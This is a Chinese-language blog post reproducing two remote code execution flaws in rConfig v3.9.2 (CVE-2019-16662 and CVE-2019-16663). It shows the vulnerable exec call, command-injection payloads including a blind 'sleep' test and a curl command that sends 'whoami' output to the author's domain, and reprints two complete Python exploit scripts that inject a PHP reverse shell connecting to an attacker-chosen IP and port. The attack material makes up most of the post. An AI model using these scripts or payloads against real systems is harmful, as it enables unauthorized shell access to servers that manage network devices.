rConfig远程代码执行漏洞复现

0x00 前言

rConfig是一个开源网络设备配置管理解决方案,可以方便网络工程师快速、频繁管理网络设备快照。

近期国外安全研究员Askar公布了rConfig的两个RCE漏洞,并表示该漏洞未得到rConfig的确认修复。

影响至最新版本v3.9.2

下面对该漏洞进行复现。

0x01 漏洞复现

未授权代码执行

第一个漏洞无需登陆即可触发,漏洞发生在install/lib/ajaxHandlers/ajaxServerSettingsChk.php

漏洞处代码

1
2
$rootTestCmd1 = 'sudo -S -u ' . $rootUname . ' chmod 0777 /home 2>&1';    // line 12
exec($rootTestCmd1, $cmdOutput, $err); // line 13

通过传入参数rootUname可控制进入exec的执行语句。

payload传入;id#即可执行id命令并得到回显。

该漏洞虽然未授权即可利用,但测试过程中该文件大部分情况下均为删除。

Askar给出利用脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/python

# Exploit Title: rConfig v3.9.2 unauthenticated Remote Code Execution
# Date: 18/09/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-16662
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22

import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 4:
print "[+] Usage : ./exploit.py target ip port"
exit()

target = sys.argv[1]

ip = sys.argv[2]

port = sys.argv[3]

payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))

install_path = target + "/install"

req = requests.get(install_path, verify=False)
if req.status_code == 404:
print "[-] Installation directory not found!"
print "[-] Exploitation failed !"
exit()
elif req.status_code == 200:
print "[+] Installation directory found!"
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload

print "[+] Triggering the payload"
print "[+] Check your listener !"

requests.get(url_to_send, verify=False)

后台无回显命令执行

第二个漏洞需要有一个认证账号,登陆后,漏洞触发点在lib/crud/search.crud.php

payload

1
searchTerm=anything&catCommand=""&&$(`sleep 5`)#

该利用点执行命令后,无回显,因此可以使用sleep函数进行延迟判断

在这里我使用dnslog方式获取到命令回显

1
""&&$(curl http://zhengbao.wang/`whoami`)#

成功获取到whoami执行结果为apache

同样Askar给出了反弹shell的利用方式。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/usr/bin/python

# Exploit Title: rConfig v3.9.2 Authenticated Remote Code Execution
# Date: 18/09/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2019-16663
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22


import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning


requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 6:
print "[+] Usage : ./exploit.py target username password ip port"
exit()

target = sys.argv[1]

username = sys.argv[2]

password = sys.argv[3]

ip = sys.argv[4]

port = sys.argv[5]

request = requests.session()

login_info = {
"user": username,
"pass": password,
"sublogin": 1
}

login_request = request.post(
target+"/lib/crud/userprocess.php",
login_info,
verify=False,
allow_redirects=True
)

dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)


if dashboard_request.status_code == 200:
print "[+] LoggedIn successfully"
payload = '''""&&php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port)
encoded_request = target+"/lib/crud/search.crud.php?searchTerm=anything&catCommand={0}".format(quote(payload))
print "[+] triggering the payload"
print "[+] Check your listener !"
exploit_req = request.get(encoded_request)

elif dashboard_request.status_code == 302:
print "[-] Wrong credentials !"
exit()

0x02 参考链接

https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/

本文标题:rConfig远程代码执行漏洞复现

文章作者:boogle

发布时间:2019年11月04日 - 15:49

最后更新:2019年11月04日 - 17:19

原始链接:http://zhengbao.wang/rConfig远程代码执行漏洞复现/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

感觉写的不错,给买个棒棒糖呗